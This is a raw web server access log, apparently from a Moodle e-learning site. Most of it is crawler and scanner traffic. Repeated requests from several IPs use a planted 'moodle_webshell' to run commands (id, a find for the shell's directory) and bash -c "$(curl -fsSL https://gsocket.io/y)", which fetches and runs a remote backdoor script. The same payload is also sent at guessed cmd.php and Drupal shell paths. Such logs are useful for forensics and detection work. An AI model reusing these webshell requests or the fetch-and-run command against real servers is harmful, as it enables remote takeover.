35.180.172.158 - - [14/Apr/2025:03:55:41 +0300] "GET /backup HTTP/1.1" 301 795 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:41 +0300] "GET /backup/ HTTP/1.1" 200 1557 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:46 +0300] "GET /new HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:48 +0300] "GET /test HTTP/1.1" 404 796 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:56 +0300] "GET /blog HTTP/1.1" 301 795 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.180.172.158 - - [14/Apr/2025:03:55:56 +0300] "GET /blog/ HTTP/1.1" 303 743 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
20.42.10.184 - - [14/Apr/2025:04:40:51 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
47.128.56.29 - - [14/Apr/2025:05:18:46 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.35.114 - - [14/Apr/2025:05:30:46 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.119.224 - - [14/Apr/2025:05:22:46 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.39.138 - - [14/Apr/2025:05:26:46 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.55.145 - - [14/Apr/2025:05:39:11 +0300] "GET /user/view.php?id=304&course=1 HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.65.236.215 - - [14/Apr/2025:06:03:52 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:03:55 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:06:05 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:12:07 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:32:36 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:33:14 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:38:20 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:38:26 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:41:36 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:42:12 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:49:11 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:49:16 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:49:46 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:49:57 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.240.76.114 - - [14/Apr/2025:06:03:41 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.60 Safari/537.36"
185.240.76.114 - - [14/Apr/2025:06:03:44 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.66 Safari/537.36"
185.240.76.114 - - [14/Apr/2025:06:03:46 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36"
185.240.76.114 - - [14/Apr/2025:06:03:48 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36"
185.240.76.114 - - [14/Apr/2025:06:03:51 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.61 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:05:57 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:11:47 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:32:48 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:33:24 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:41:43 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:42:28 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:43:31 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:43:42 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:49:57 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:50:17 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:56:17 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:57:36 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:57:43 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:00:24 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
43.153.76.247 - - [14/Apr/2025:07:05:06 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
103.65.236.215 - - [14/Apr/2025:07:07:15 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:11:03 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:11:06 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:12:00 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:06:56:07 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:00:18 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:00:25 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:00:25 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:07:10 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:12:03 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:26:22 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:26:29 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:27:00 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:21:06 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:21:09 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.65.236.215 - - [14/Apr/2025:07:26:42 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "http://example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
188.166.219.31 - - [14/Apr/2025:07:31:20 +0300] "GET /sftp-config.json HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
188.166.219.31 - - [14/Apr/2025:07:31:21 +0300] "GET /.vscode/sftp.json HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
114.119.134.165 - - [14/Apr/2025:07:35:39 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
207.46.13.231 - - [14/Apr/2025:07:55:23 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.196 - - [14/Apr/2025:07:55:32 +0300] "GET /pluginfile.php/1/theme_adaptable/p1/1601459808/elearning.jpg HTTP/1.1" 303 627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.66.18 - - [14/Apr/2025:08:05:59 +0300] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
75.119.143.203 - - [14/Apr/2025:08:54:15 +0300] "GET / HTTP/1.1" 303 1491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0 Safari/537.36"
161.97.149.199 - - [14/Apr/2025:08:54:21 +0300] "GET / HTTP/1.1" 303 1491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0 Safari/537.36"
75.119.135.232 - - [14/Apr/2025:08:54:20 +0300] "GET / HTTP/1.1" 303 1491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0 Safari/537.36"
66.249.66.18 - - [14/Apr/2025:09:05:06 +0300] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.176.127.29 - - [14/Apr/2025:09:09:24 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
193.176.127.29 - - [14/Apr/2025:09:09:25 +0300] "GET /favicon.ico HTTP/1.1" 404 796 "http://distance.gluk.ac.ke/local/moodle_webshell/webshell.php?action=exec&cmd=id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
193.176.127.29 - - [14/Apr/2025:09:09:49 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(%20curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
193.176.127.29 - - [14/Apr/2025:09:09:53 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(%20curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
193.176.127.29 - - [14/Apr/2025:09:09:58 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
193.176.127.29 - - [14/Apr/2025:09:10:00 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(%20curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
193.176.127.29 - - [14/Apr/2025:09:09:32 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=find%20/%20-type%20d%20-name%20%22moodle_webshell%22%202%3E/dev/null HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
193.176.127.29 - - [14/Apr/2025:09:10:33 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=find%20/%20-type%20d%20-name%20%22moodle_webshell%22%202%3E/dev/null HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
193.176.127.29 - - [14/Apr/2025:09:11:37 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=find%20/%20-type%20d%20-name%20%22moodle_webshell%22%202%3E/dev/null HTTP/1.1" 200 136 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
66.249.66.18 - - [14/Apr/2025:09:57:02 +0300] "GET /honeymoonbacc/fecacf1838078.shtml HTTP/1.1" 404 796 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.128.227.74 - - [14/Apr/2025:10:48:26 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36"
185.128.227.74 - - [14/Apr/2025:10:48:19 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.91 Safari/537.36"
185.128.227.74 - - [14/Apr/2025:10:48:29 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.101 Safari/537.36"
185.128.227.74 - - [14/Apr/2025:10:48:32 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.103 Safari/537.36"
185.128.227.74 - - [14/Apr/2025:10:48:35 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.101 Safari/537.36"
205.169.39.26 - - [14/Apr/2025:10:57:17 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.213.83.133 - - [14/Apr/2025:12:50:44 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
185.213.83.133 - - [14/Apr/2025:12:50:58 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=find%20/%20-type%20d%20-name%20%22moodle_webshell%22%202%3E/dev/null HTTP/1.1" 200 139 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
185.213.83.133 - - [14/Apr/2025:12:51:17 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(%20curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
68.183.183.85 - - [14/Apr/2025:13:34:43 +0300] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:34:46 +0300] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:02 +0300] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
